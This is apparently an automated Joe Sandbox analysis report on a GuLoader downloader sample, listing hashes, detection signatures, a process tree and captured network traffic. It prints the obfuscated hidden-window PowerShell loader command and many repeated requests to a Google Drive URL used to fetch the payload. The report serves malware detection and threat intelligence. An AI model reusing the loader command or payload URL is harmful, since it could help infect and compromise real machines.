Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GyGE2VaBFL.exe

Overview

General Information

Sample name:GyGE2VaBFL.exe
renamed because original name is a hash value
Original sample name:0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783.exe
Analysis ID:1632354
MD5:d8eacf83ca07943696bf5e23528cc348
SHA1:1aa708342f955f268f43cbd7705dc1497cf91d46
SHA256:0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • GyGE2VaBFL.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\GyGE2VaBFL.exe" MD5: D8EACF83CA07943696BF5E23528CC348)
    • powershell.exe (PID: 7720 cmdline: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6128 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 7896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1676887865.000000000ACA8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000A.00000002.2415295376.0000000005518000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Msiexec Initiated Connection
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6128, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49720
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7720, TargetFilename: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) ", CommandLine: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GyGE2VaBFL.exe", ParentImage: C:\Users\user\Desktop\GyGE2VaBFL.exe, ParentProcessId: 7680, ParentProcessName: GyGE2VaBFL.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) ", ProcessId: 7720, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7896, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-07T22:46:43.879482+010028032702Potentially Bad Traffic192.168.2.449720216.58.206.78443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exeVirustotal: Detection: 63%Perma Link
      Source: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exeReversingLabs: Detection: 47%
      Multi AV Scanner detection for submitted file
      Source: GyGE2VaBFL.exeVirustotal: Detection: 63%Perma Link
      Source: GyGE2VaBFL.exeReversingLabs: Detection: 47%
      Joe Sandbox ML detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: GyGE2VaBFL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: GyGE2VaBFL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ws\System.Core.pdb source: powershell.exe, 00000001.00000002.1675183518.00000000088C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.1671040347.000000000771E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00406448 FindFirstFileA,FindClose,0_2_00406448
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040589C
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 216.58.206.78:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
